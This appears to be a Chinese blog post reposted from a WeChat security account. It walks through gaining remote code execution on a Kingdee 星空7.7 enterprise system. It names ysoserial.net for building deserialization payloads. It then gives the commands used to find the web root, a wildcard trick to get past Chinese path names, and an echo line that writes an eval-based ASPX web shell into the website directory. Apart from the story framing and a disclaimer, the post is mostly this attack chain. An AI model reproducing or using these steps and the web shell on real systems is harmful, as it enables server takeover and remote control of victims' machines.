风和日丽的一天,正沉浸在宁静的午后,手机突然传来一阵滴滴声,感觉大事不妙,取出手机一看,是一位老大哥发来消息,内容令人好奇:“兄弟,我们公司有个应用系统可能有点问题,帮忙测试一波看看?”面对老哥这么BT的请求,觉得是一个有意思的挑战,欣然答应,冲TYD。
使用ysoserial.net工具构造序列化数据实现RCE
工具地址:https:
//github.com/pwntester/ysoserial.net
使用工具生成payload
**第一步:查看存在哪些盘**
``
`cmd
fsutil fsinfo drives
f: & cd & dir /S topca.js
在F盘找到两个目录存在目标文件
F:星空7.7ManageSitejsca
F:星空7.7Websitejsca
使用通配符的方式进行中文绕过,例如:
cd
*7.7*
确定目录为
F
:星空7
.7
Website
js
ca
进行文件写入,注意尖括号需要进行转义
cd
F
:*7
.7
*
Website
js
&
echo
^<%@ Page Language=
"Jscript"
%^> ^<%eval(Request.Item[
"pass"
],
"unsafe"
);%^> >
shell
.aspx
原文始发于微信公众号(Seraph安全实验室):重生第二篇之金蝶rce上传绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论